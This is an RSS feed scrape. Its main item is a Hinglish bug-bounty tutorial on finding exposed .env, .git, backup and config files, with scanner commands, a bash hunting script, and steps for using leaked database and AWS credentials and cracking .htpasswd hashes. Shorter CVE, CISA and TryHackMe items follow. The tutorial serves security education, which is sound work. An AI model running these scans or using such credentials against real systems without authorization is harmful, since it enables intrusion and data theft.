<content:encoded><![CDATA[<h3>Backup Files + .env Exposure Developers Ki Sabse Badi Galti: Config Files Se Credentials Nikalo! (Hinglish Mein)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SbWJEowE33pwRee-mqAYBA.png"></figure><p><strong>Series: Bug Bounty Zero se Hero 🦸 | Article #21</strong><br><em>By HackerMD | 17 min read</em></p><h3>Aaj Kya Seekhenge?</h3><ul><li>Backup files exposure kya hai basics se</li><li>.env, .git, config files sabhi types</li><li>Kahan dhundhen complete checklist</li><li>Automated tools Dirsearch, Feroxbuster, Nuclei</li><li>.git exposure source code nikalo</li><li>Real exploitation credentials se aage</li><li>Complete bug bounty workflow</li></ul><blockquote><strong>Kyun zaroori hai?</strong> Yeh <strong>sabse easy Critical bugs</strong> hain bug bounty mein! Koi fancy technique nahi sirf URL mein .env lagao aur dekho! Developers test mein files upload karte hain production mein wahi rehta hai <strong>database passwords, API keys, AWS credentials sab exposed!</strong> Bounty: <strong>$500 se $10,000+</strong></blockquote><h3>Yeh Kaise Hota Hai? Simple Story</h3><pre>Ek developer hai — Rahul।<br><br>Step 1: Local machine pe .env banaya:<br>DB_HOST=localhost<br>DB_PASSWORD=SuperSecret123<br>AWS_KEY=AKIA...<br><br>Step 2: Code deploy kiya server pe:<br>git push → Server pe sab files gayi!<br>.env bhi chali gayi! 😱<br><br>Step 3: Web server publicly serve kar raha hai:<br>https://company.com/.env<br>→ Browser mein open karo → Poori file! 🔴<br><br>Rahul ko pata bhi nahi!</pre><p><strong>Yahi hai Backup/Config File Exposure!</strong></p><h3>PART 1: File Types Sabhi Samjho</h3><h3>Type 1: .env Files GOLDMINE!</h3><pre># .env file mein kya hota hai:<br>APP_NAME=MyApp<br>APP_ENV=production<br>APP_DEBUG=true           ← Debug mode on!<br>APP_KEY=base64:abc123... ← Laravel secret key!<br><br>DB_CONNECTION=mysql<br>DB_HOST=db.internal.company.com<br>DB_PORT=3306<br>DB_DATABASE=production_db<br>DB_USERNAME=root<br>DB_PASSWORD=SuperSecret@123  ← Database password! 🔴<br><br>REDIS_PASSWORD=redis123<br><br>MAIL_USERNAME=noreply@company.com<br>MAIL_PASSWORD=mailpass123    ← Email credentials!<br><br>AWS_ACCESS_KEY_ID=AKIAIOSFODNN7<br>AWS_SECRET_ACCESS_KEY=abc123xyz  ← AWS Keys! 🔴<br><br>STRIPE_SECRET=sk_live_abc123    ← Payment keys!<br>STRIPE_PUBLISHABLE=pk_live_abc<br><br>TWILIO_SID=ACxxx<br>TWILIO_TOKEN=abc123<br><br>GITHUB_TOKEN=ghp_abc123    ← GitHub access!<br><br># Ek file mein poori company ki secrets! 💀</pre><h3>Type 2: .git Directory Exposure</h3><pre>.git folder = Poora source code history!<br><br>https://target.com/.git/<br>→ Git repository accessible!<br>→ Source code download kar sakte hain!<br>→ Commit history mein old passwords!<br>→ Developer emails!<br>→ Internal URLs!<br>→ Hardcoded credentials!</pre><h3>Type 3: Backup Files</h3><pre>Common backup extensions:<br>.bak → filename.php.bak<br>.old → config.php.old<br>.orig → settings.orig<br>.backup → database.backup<br>.copy → config.copy<br>.tmp → upload.tmp<br>.swp → vim swap file (index.php.swp)<br>~   → index.php~ (text editor backup)<br><br>Example:<br>https://target.com/config.php.bak  → Source code!<br>https://target.com/wp-config.php~  → WordPress DB pass!</pre><h3>Type 4: Config Files</h3><pre># PHP configs:<br>config.php, configuration.php, settings.php<br>database.php, db.php, conn.php, connect.php<br><br># Web server configs:<br>.htaccess, .htpasswd  ← Basic auth credentials!<br>web.config            ← .NET connection strings!<br>nginx.conf, apache.conf<br><br># Application configs:<br>config.yml, config.yaml<br>config.json, settings.json<br>appsettings.json      ← .NET secrets!<br>application.properties ← Java/Spring!<br>secrets.yml<br><br># Database files:<br>dump.sql, backup.sql<br>database.sql, db.sql<br>*.sqlite, *.db</pre><h3>Type 5: Log Files</h3><pre># Log files kya expose karte hain:<br>error.log      → Stack traces, file paths, internal IPs<br>access.log     → All user requests, session IDs!<br>debug.log      → Verbose app information<br>application.log → Business logic, user data<br><br>URLs:<br>/logs/error.log<br>/log/debug.log<br>/var/log/app.log<br>/logs/</pre><h3>Type 6: IDE / Editor Files</h3><pre>.DS_Store     → Mac folder structure expose!<br>.idea/        → IntelliJ project files<br>.vscode/      → VS Code settings<br>*.swp         → Vim swap files (source code!)<br>.project      → Eclipse project<br>thumbs.db     → Windows thumbnail DB</pre><h3>PART 2: Kahan Dhundhen Complete URL Checklist</h3><pre># ─── .ENV FILES ───────────────────────────<br>/.env<br>/.env.local<br>/.env.development<br>/.env.production<br>/.env.staging<br>/.env.backup<br>/.env.old<br>/.env.example    ← Sometimes real values!<br>/.env.bak<br>/api/.env<br>/backend/.env<br>/app/.env<br>/src/.env<br><br># ─── GIT DIRECTORY ────────────────────────<br>/.git/<br>/.git/config     ← Remote URLs!<br>/.git/HEAD<br>/.git/COMMIT_EDITMSG<br>/.git/logs/HEAD  ← Commit history!<br>/.git/refs/heads/master<br><br># ─── CONFIG FILES ─────────────────────────<br>/config.php<br>/config/database.php<br>/wp-config.php       ← WordPress!<br>/configuration.php   ← Joomla!<br>/settings.py         ← Django!<br>/appsettings.json    ← .NET!<br>/application.properties ← Spring!<br>/config/config.yml<br>/config/secrets.yml<br><br># ─── BACKUP FILES ─────────────────────────<br>/backup/<br>/backups/<br>/backup.sql<br>/dump.sql<br>/database.sql<br>/db.sql<br>/backup.zip<br>/site.tar.gz<br>/www.tar.gz<br><br># ─── LOG FILES ────────────────────────────<br>/logs/<br>/log/<br>/error.log<br>/debug.log<br>/access.log<br>/application.log<br>/laravel.log        ← Laravel!<br>/storage/logs/      ← Laravel storage!<br><br># ─── HTPASSWD ─────────────────────────────<br>/.htpasswd<br>/.htaccess<br>/admin/.htpasswd</pre><h3>PART 3: Automated Tools Elite Use</h3><h3>Tool 1: Dirsearch Best Directory Bruteforcer</h3><pre># Install karo<br>pip3 install dirsearch<br><br># Basic scan — sensitive files ke liye<br>dirsearch -u https://target.com \<br>  -e php,txt,bak,old,env,sql,log,zip,tar,gz,yml,yaml,json,config \<br>  -t 50<br><br># Specific wordlist ke saath<br>dirsearch -u https://target.com \<br>  -w /usr/share/wordlists/dirb/common.txt \<br>  -e env,bak,sql,log<br><br># Output file mein save<br>dirsearch -u https://target.com \<br>  -e env,bak,sql \<br>  -o dirsearch_results.txt<br><br># Only interesting status codes<br>dirsearch -u https://target.com \<br>  -i 200,301,302,403 \<br>  -e env,bak,config,sql</pre><h3>Tool 2: Feroxbuster Fast Recursive Scanner</h3><pre># Install karo<br>sudo apt install feroxbuster -y<br># Ya:<br>cargo install feroxbuster<br><br># Basic scan<br>feroxbuster -u https://target.com \<br>  -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt<br><br># Sensitive files focus<br>feroxbuster -u https://target.com \<br>  -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files.txt \<br>  -x env,bak,sql,log,config,php,txt \<br>  -o ferox_results.txt<br><br># Recursive scan (subdirectories bhi!)<br>feroxbuster -u https://target.com \<br>  -w wordlist.txt \<br>  --depth 3 \<br>  -x env,bak,sql</pre><h3>Tool 3: Nuclei Template-Based Detection</h3><pre># .env exposure templates<br>nuclei -l targets.txt \<br>  -t ~/nuclei-templates/exposures/configs/ \<br>  -o config_exposure.txt<br><br># Backup files<br>nuclei -l targets.txt \<br>  -t ~/nuclei-templates/exposures/backups/ \<br>  -o backup_found.txt<br><br># Git exposure<br>nuclei -l targets.txt \<br>  -t ~/nuclei-templates/exposures/git/ \<br>  -o git_exposure.txt<br><br># Sabhi exposure templates<br>nuclei -l targets.txt \<br>  -t ~/nuclei-templates/exposures/ \<br>  -severity medium,high,critical \<br>  -o all_exposures.txt</pre><h3>Tool 4: GitTools .git Exploitation</h3><pre># Install karo<br>git clone https://github.com/internetwache/GitTools<br>cd GitTools<br><br># .git directory dump karo<br>./Dumper/gitdumper.sh \<br>  https://target.com/.git/ \<br>  /tmp/git_dump/<br><br># Source code extract karo<br>./Extractor/extractor.sh \<br>  /tmp/git_dump/ \<br>  /tmp/extracted_code/<br><br># Ab extracted code mein secrets dhundho!<br>grep -r "password" /tmp/extracted_code/<br>grep -r "api_key" /tmp/extracted_code/<br>grep -r "secret" /tmp/extracted_code/<br>grep -r "AWS_" /tmp/extracted_code/</pre><h3>Tool 5: truffleHog Secrets in Git History</h3><pre># Install karo<br>pip3 install truffleHog<br><br># Git repo scan karo (extracted code)<br>trufflehog filesystem /tmp/extracted_code/<br><br># GitHub repo scan<br>trufflehog github \<br>  --repo https://github.com/company/repo<br><br># Regex mode<br>trufflehog git \<br>  file:///tmp/extracted_code/ \<br>  --regex</pre><h3>PART 4: Exploitation Files Milne Ke Baad Kya Karo?</h3><h3>Scenario 1: .env Mila Database Access!</h3><pre># .env se credentials nikalo:<br>DB_HOST=db.internal.company.com<br>DB_USER=root<br>DB_PASS=SuperSecret123<br>DB_NAME=production<br><br># Direct MySQL connect karo:<br>mysql -h db.internal.company.com \<br>  -u root \<br>  -pSuperSecret123 \<br>  production<br><br># Ya SQLMap se:<br>sqlmap -d "mysql://root:SuperSecret123@db.host/production" \<br>  --dump-all<br><br># PoC ke liye bas screenshot kaafi hai!<br># Direct exploitation mat karo! Report karo!</pre><h3>Scenario 2: .env Se AWS Keys Cloud Access!</h3><pre># .env se AWS keys mile:<br>AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE<br>AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG<br><br># AWS CLI configure karo:<br>export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE<br>export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG<br><br># Impact demonstrate karo (read-only!):<br>aws iam get-user           → Kaun sa user hai?<br>aws s3 ls                  → S3 buckets list<br>aws ec2 describe-instances → Servers list<br><br># Screenshot le → Report karo!<br># Data access/modify mat karo!</pre><h3>Scenario 3: .git Se Source Code More Bugs!</h3><pre># Source code mil gaya — ab dhundho:<br><br># Hardcoded credentials<br>grep -r "password\s*=" /extracted/ \<br>  --include="*.php" --include="*.py" --include="*.js"<br><br># API keys<br>grep -rE "[A-Za-z0-9]{20,}" /extracted/ \<br>  --include="*.env" --include="*.config"<br><br># Internal URLs/endpoints<br>grep -r "http://internal" /extracted/<br>grep -r "localhost" /extracted/<br>grep -r "192.168\|10\.0\." /extracted/<br><br># Hidden endpoints (new attack surface!)<br>grep -r "route\|Route\|@app.route" /extracted/<br>grep -r "app.get\|app.post" /extracted/</pre><h3>Scenario 4: .htpasswd Mila Password Crack!</h3><pre># .htpasswd content:<br>admin:$apr1$xyz$hashedpassword<br><br># Hashcat se crack karo:<br>hashcat -m 1600 hash.txt rockyou.txt<br><br># John the Ripper se:<br>john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt<br><br># Cracked password = Admin panel access!</pre><h3>PART 5: Complete Elite Workflow</h3><pre>#!/bin/bash<br># backup_exposure_hunt.sh<br><br>TARGET=$1<br>DIR="backup_${TARGET}"<br>mkdir -p $DIR<br><br>echo "🗂️ Backup File Hunt: $TARGET"<br>echo "═══════════════════════════════"<br><br># Step 1: Nuclei se quick check<br>echo "☢️  Nuclei exposure scan..."<br>nuclei -u $TARGET \<br>  -t ~/nuclei-templates/exposures/ \<br>  -silent \<br>  -o $DIR/nuclei_exposures.txt 2&gt;/dev/null<br>echo "✅ Nuclei: $(wc -l &lt; $DIR/nuclei_exposures.txt) findings"<br><br># Step 2: Direct URL check — most common files<br>echo "🔍 Direct file check..."<br>SENSITIVE_FILES=(<br>  ".env" ".env.local" ".env.production" ".env.backup"<br>  ".git/config" ".git/HEAD"<br>  "config.php" "wp-config.php" "configuration.php"<br>  "backup.sql" "dump.sql" "database.sql"<br>  ".htpasswd" "web.config" "appsettings.json"<br>  "config.yml" "secrets.yml" "docker-compose.yml"<br>  "error.log" "debug.log" "laravel.log"<br>  "composer.json" "package.json"<br>)<br><br>for file in "${SENSITIVE_FILES[@]}"; do<br>  response=$(curl -s -o /dev/null -w "%{http_code}" \<br>    "https://$TARGET/$file" --max-time 5)<br>  if [ "$response" = "200" ]; then<br>    echo "🔴 FOUND: https://$TARGET/$file" \<br>      | tee -a $DIR/found_files.txt<br>  fi<br>done<br><br># Step 3: Dirsearch scan<br>echo "🗄️  Dirsearch scan..."<br>dirsearch -u https://$TARGET \<br>  -e env,bak,old,sql,log,config,yml,yaml,json,zip,tar,gz \<br>  -t 30 \<br>  -q \<br>  -o $DIR/dirsearch.txt 2&gt;/dev/null<br><br># Step 4: .git check aur dump<br>if curl -s "https://$TARGET/.git/HEAD" | \<br>   grep -q "ref:"; then<br>  echo "🔴 GIT EXPOSED! Dumping..."<br>  ./GitTools/Dumper/gitdumper.sh \<br>    "https://$TARGET/.git/" \<br>    $DIR/git_dump/ 2&gt;/dev/null<br>  echo "✅ Git dumped: $DIR/git_dump/"<br><br>  # Secrets dhundho<br>  grep -r "password\|api_key\|secret\|token\|AWS_" \<br>    $DIR/git_dump/ &gt; $DIR/git_secrets.txt<br>  echo "🔑 Git secrets: $(wc -l &lt; $DIR/git_secrets.txt)"<br>fi<br><br>echo ""<br>echo "═══════════════════════════════"<br>echo "📊 Results:"<br>echo "Found Files  : $(cat $DIR/found_files.txt \<br>  2&gt;/dev/null | wc -l)"<br>echo "Dirsearch    : $(wc -l &lt; $DIR/dirsearch.txt)"<br>echo "All results  : $DIR/"</pre><h3>Quick Reference Cheat Sheet</h3><pre># ─── TOP PRIORITY URLS ────────────────────<br>/.env<br>/.git/config<br>/wp-config.php<br>/backup.sql<br>/.htpasswd<br>/config.php<br>/appsettings.json<br>/docker-compose.yml<br>/laravel.log<br><br># ─── TOOLS ────────────────────────────────<br>dirsearch -u URL -e env,bak,sql,log<br>feroxbuster -u URL -x env,bak,sql<br>nuclei -u URL -t exposures/<br>gitdumper.sh URL/.git/ /output/<br><br># ─── AFTER FINDING ────────────────────────<br>.env → DB creds, AWS keys, API keys<br>.git → Source code → More bugs!<br>.sql → Database dump → User data<br>.htpasswd → Hash crack → Admin access<br>config.php → DB connection string<br><br># ─── IMPACT ───────────────────────────────<br>DB credentials  = High ($500-2000)<br>AWS/Cloud keys  = Critical ($3000-10000+)<br>Source code     = High ($1000-3000)<br>User data dump  = Critical ($5000+)<br>Payment keys    = Critical ($5000+)</pre><h3>Aaj Ka Homework</h3><pre># 1. SecLists download karo (wordlists ke liye):<br>git clone https://github.com/danielmiessler/SecLists \<br>  /usr/share/wordlists/SecLists<br><br># 2. Dirsearch install + test karo:<br>pip3 install dirsearch<br>dirsearch -u http://testphp.vulnweb.com \<br>  -e env,bak,sql,php \<br>  -t 20<br><br># 3. Manual check karo (legal target):<br>curl -s http://testphp.vulnweb.com/.env<br>curl -s http://testphp.vulnweb.com/.git/HEAD<br>curl -s http://testphp.vulnweb.com/backup.sql<br><br># 4. Nuclei exposure templates run karo:<br>nuclei -u http://testphp.vulnweb.com \<br>  -t ~/nuclei-templates/exposures/<br><br># 5. Bug bounty program choose karo:<br># HackerOne/Bugcrowd mein koi wildcard scope wala<br># *.company.com pe yeh sab check karo!</pre><h3>Quick Revision</h3><pre>🗂️ Exposure    = Sensitive files publicly accessible<br>🔴 .env        = Database, AWS, API keys — CRITICAL!<br>📁 .git        = Source code history — HIGH!<br>💾 Backup      = .bak, .old, .sql — MEDIUM-HIGH!<br>🔑 .htpasswd   = Basic auth hashes — MEDIUM!<br>📋 Config      = Connection strings — HIGH!<br>🤖 Tools       = Dirsearch, Feroxbuster, Nuclei<br>💀 GitTools    = .git directory dump + extract<br>🔍 truffleHog  = Secrets in git history<br>💰 Bounty      = Easy Critical — Highest ROI!</pre><h3>Meri Baat…</h3><p>Ek fintech startup pe maine Dirsearch run kiya:</p><pre>dirsearch -u https://target-fintech.com \<br>  -e env,bak,sql,log -t 30</pre><p><strong>2 minutes mein:</strong></p><pre>[200] https://target-fintech.com/.env</pre><p>File open ki:</p><pre>DB_PASSWORD=Fintech@Prod2024!<br>STRIPE_SECRET=sk_live_xxxxxxxxxxxxxxxx<br>AWS_ACCESS_KEY_ID=AKIA...<br>AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxx<br>SENDGRID_API_KEY=SG.xxxxxxxxxxxxx</pre><p><strong>Stripe live key, AWS credentials, SendGrid sab ek file mein!</strong></p><p>AWS check kiya:</p><pre>aws s3 ls<br># 23 S3 buckets — user KYC documents, financial records!</pre><p><strong>Bounty: $8,500 Critical!</strong> 🎉</p><p><strong>Lesson: Dirsearch + .env = Fastest Critical bounty! Har target pe yeh pehle check karo!</strong></p><p>Agle article mein <strong>Open Redirect </strong>Simple lekin phishing aur OAuth bypass ke liye powerful! Chhoti vulnerability, bada chain! 🔥</p><p><strong><em>HackerMD</em></strong><em> Bug Bounty Hunter | Cybersecurity Researcher</em><br><em>GitHub: </em><a href="https://github.com/BotGJ16"><em>BotGJ16</em></a><em> | Medium: </em><a href="https://medium.com/@HackerMD"><em>@HackerMD</em></a></p><p><em>Previous: </em><a href="https://medium.com/@HackerMD"><em>Article #20 Burp Suite Complete Guide</em></a><br><em>Next: Article #22 Open Redirect: Simple Bug, Powerful Chains!</em></p><p><em>#BackupFiles #EnvExposure #BugBounty #WebSecurity #EthicalHacking #Hinglish #InfoSec #HackerMD</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=1432674639b8" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/backup-files-env-exposure-developers-ki-sabse-badi-galti-config-files-se-credentials-nikalo-1432674639b8">Backup Files + .env Exposure Developers Ki Sabse Badi Galti: Config Files Se Credentials Nikalo!</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-7110 | code-projects Invoice System in Laravel 1.0 /item item name/description cross site scripting (EUVD-2026-25811)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in code-projects Invoice System in Laravel 1.0. Affected is an unknown function of the file /item. Executing a manipulation of the argument item name/description can lead to cross site scripting.

This vulnerability is registered as C...]]></description>
<link>https://tsecurity.de/de/3468240/sicherheitsluecken/cve-2026-7110-code-projects-invoice-system-in-laravel-10-item-item-namedescription-cross-site-scripting-euvd-2026-25811/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3468240/sicherheitsluecken/cve-2026-7110-code-projects-invoice-system-in-laravel-10-item-item-namedescription-cross-site-scripting-euvd-2026-25811/</guid>
<pubDate>Mon, 27 Apr 2026 15:23:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/code-projects:invoice_system_in_laravel">code-projects Invoice System in Laravel 1.0</a>. Affected is an unknown function of the file <em>/item</em>. Executing a manipulation of the argument <em>item name/description</em> can lead to cross site scripting.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-7110">CVE-2026-7110</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco FMC Zero-Day Among 31 High-Impact Vulnerabilities Exploited in March]]></title>
<description><![CDATA[31 high-impact vulnerabilities were actively exploited in March 2026, with a Cisco firewall zero-day abused by the Interlock ransomware group emerging as one of the most dangerous threats to enterprise networks. Affected vendors span core enterprise and developer ecosystems, including Cisco, Micr...]]></description>
<link>https://tsecurity.de/de/3437789/it-security-nachrichten/cisco-fmc-zero-day-among-31-high-impact-vulnerabilities-exploited-in-march/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3437789/it-security-nachrichten/cisco-fmc-zero-day-among-31-high-impact-vulnerabilities-exploited-in-march/</guid>
<pubDate>Thu, 16 Apr 2026 09:38:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>31 high-impact vulnerabilities were actively exploited in March 2026, with a Cisco firewall zero-day abused by the Interlock ransomware group emerging as one of the most dangerous threats to enterprise networks. Affected vendors span core enterprise and developer ecosystems, including Cisco, Microsoft, Google, ConnectWise, Langflow, Citrix, Aquasecurity, Nginx UI, Qualcomm, F5, Craft CMS, Laravel, Apple, […]</p>
<p>The post <a href="https://gbhackers.com/cisco-fmc-zero-day/">Cisco FMC Zero-Day Among 31 High-Impact Vulnerabilities Exploited in March</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. CISA adds Microsoft SharePoint Server, and Microsoft Office Excel flaws to its Known Exploited Vulnerabilities catalog]]></title>
<description><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft SharePoint Server, and Microsoft Office Excel flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its...]]></description>
<link>https://tsecurity.de/de/3435957/it-security-nachrichten/us-cisa-adds-microsoft-sharepoint-server-and-microsoft-office-excel-flaws-to-its-known-exploited-vulnerabilities-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3435957/it-security-nachrichten/us-cisa-adds-microsoft-sharepoint-server-and-microsoft-office-excel-flaws-to-its-known-exploited-vulnerabilities-catalog/</guid>
<pubDate>Wed, 15 Apr 2026 17:09:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft SharePoint Server, and Microsoft Office Excel flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the flaws added to the catalog: The first vulnerability […]]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. CISA adds Microsoft SharePoint Server, and Microsoft Office Excel flaws to its Known Exploited Vulnerabilities catalog]]></title>
<description><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft SharePoint Server, and Microsoft Office Excel flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its...]]></description>
<link>https://tsecurity.de/de/3435945/it-security-nachrichten/us-cisa-adds-microsoft-sharepoint-server-and-microsoft-office-excel-flaws-to-its-known-exploited-vulnerabilities-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3435945/it-security-nachrichten/us-cisa-adds-microsoft-sharepoint-server-and-microsoft-office-excel-flaws-to-its-known-exploited-vulnerabilities-catalog/</guid>
<pubDate>Wed, 15 Apr 2026 17:09:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft SharePoint Server, and Microsoft Office Excel flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its Known…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/u-s-cisa-adds-microsoft-sharepoint-server-and-microsoft-office-excel-flaws-to-its-known-exploited-vulnerabilities-catalog/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/u-s-cisa-adds-microsoft-sharepoint-server-and-microsoft-office-excel-flaws-to-its-known-exploited-vulnerabilities-catalog/">U.S. CISA adds Microsoft SharePoint Server, and Microsoft Office Excel flaws to its Known Exploited Vulnerabilities catalog</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. CISA adds Adobe, Fortinet, Microsoft Exchange Server, and Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog]]></title>
<description><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Adobe, Fortinet, Microsoft Exchange Server, and Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS fl...]]></description>
<link>https://tsecurity.de/de/3431135/it-security-nachrichten/us-cisa-adds-adobe-fortinet-microsoft-exchange-server-and-microsoft-windows-flaws-to-its-known-exploited-vulnerabilities-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3431135/it-security-nachrichten/us-cisa-adds-adobe-fortinet-microsoft-exchange-server-and-microsoft-windows-flaws-to-its-known-exploited-vulnerabilities-catalog/</guid>
<pubDate>Tue, 14 Apr 2026 10:22:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Adobe, Fortinet, Microsoft Exchange Server, and Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/u-s-cisa-adds-adobe-fortinet-microsoft-exchange-server-and-microsoft-windows-flaws-to-its-known-exploited-vulnerabilities-catalog/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/u-s-cisa-adds-adobe-fortinet-microsoft-exchange-server-and-microsoft-windows-flaws-to-its-known-exploited-vulnerabilities-catalog/">U.S. CISA adds Adobe, Fortinet, Microsoft Exchange Server, and Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. CISA adds Adobe, Fortinet, Microsoft Exchange Server, and Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog]]></title>
<description><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Adobe, Fortinet, Microsoft Exchange Server, and Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS fl...]]></description>
<link>https://tsecurity.de/de/3431107/hacking/us-cisa-adds-adobe-fortinet-microsoft-exchange-server-and-microsoft-windows-flaws-to-its-known-exploited-vulnerabilities-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3431107/hacking/us-cisa-adds-adobe-fortinet-microsoft-exchange-server-and-microsoft-windows-flaws-to-its-known-exploited-vulnerabilities-catalog/</guid>
<pubDate>Tue, 14 Apr 2026 10:05:52 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Adobe, Fortinet, Microsoft Exchange Server, and Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the flaws added to the catalog: Last week, […]]]></content:encoded>
</item>
<item>
<title><![CDATA[️ OWASP API Top 10 — TryHackMe Walkthrough (Part 2)]]></title>
<description><![CDATA[Hands-on exploitation and mitigation of advanced API vulnerabilities with real-world scenarios.🔗 References & Previous PartBefore diving into Part 2, check out Part 1:Read Part 1 on MediumGitHub Repo: https://github.com/AdityaBhatt3010/OWASP-Top-10-API-THM-Part-1📌 IntroductionIn Part 1, we explor...]]></description>
<link>https://tsecurity.de/de/3426189/hacking/owasp-api-top-10-tryhackme-walkthrough-part-2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3426189/hacking/owasp-api-top-10-tryhackme-walkthrough-part-2/</guid>
<pubDate>Sat, 11 Apr 2026 17:53:20 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Hands-on exploitation and mitigation of advanced API vulnerabilities with real-world scenarios.</h4><h3>🔗 References &amp; Previous Part</h3><p>Before diving into Part 2, check out Part 1:</p><ul><li><a href="https://happycamper84.medium.com/owasp-api-security-top-10-1-tryhackme-walkthrough-252f2a6ecd49?utm_source=chatgpt.com">Read Part 1 on Medium</a></li><li>GitHub Repo: <a href="https://github.com/AdityaBhatt3010/OWASP-Top-10-API-THM-Part-1">https://github.com/AdityaBhatt3010/OWASP-Top-10-API-THM-Part-1</a></li></ul><h3>📌 Introduction</h3><p>In Part 1, we explored core API vulnerabilities like BOLA, Broken Authentication, and Data Exposure. These primarily revolved around authorization and authentication flaws.</p><p>Now in Part 2, things get more backend-heavy and dangerous — focusing on:</p><ul><li>Improper data handling</li><li>Misconfigurations</li><li>Injection attacks</li><li>Legacy API exposure</li><li>Logging failures</li></ul><p>👉 APIs are the backbone of modern applications, and misconfigurations here can lead to full system compromise ([TryHackMe][1])</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*9V6N9_xIbH4H7Kz5.jpeg"></figure><h3>📌 Task 1 — Environment Setup</h3><p>We start by launching the TryHackMe machine which includes:</p><ul><li>Windows VM</li><li>Talend API Tester</li><li>Laravel-based vulnerable APIs</li></ul><p>This setup allows us to simulate real-world API exploitation scenarios instead of just theory.</p><h3>📌 Task 2 — Vulnerability VI: Mass Assignment</h3><h3>🧠 Understanding the Vulnerability</h3><p>Mass Assignment occurs when backend frameworks automatically bind user input to database 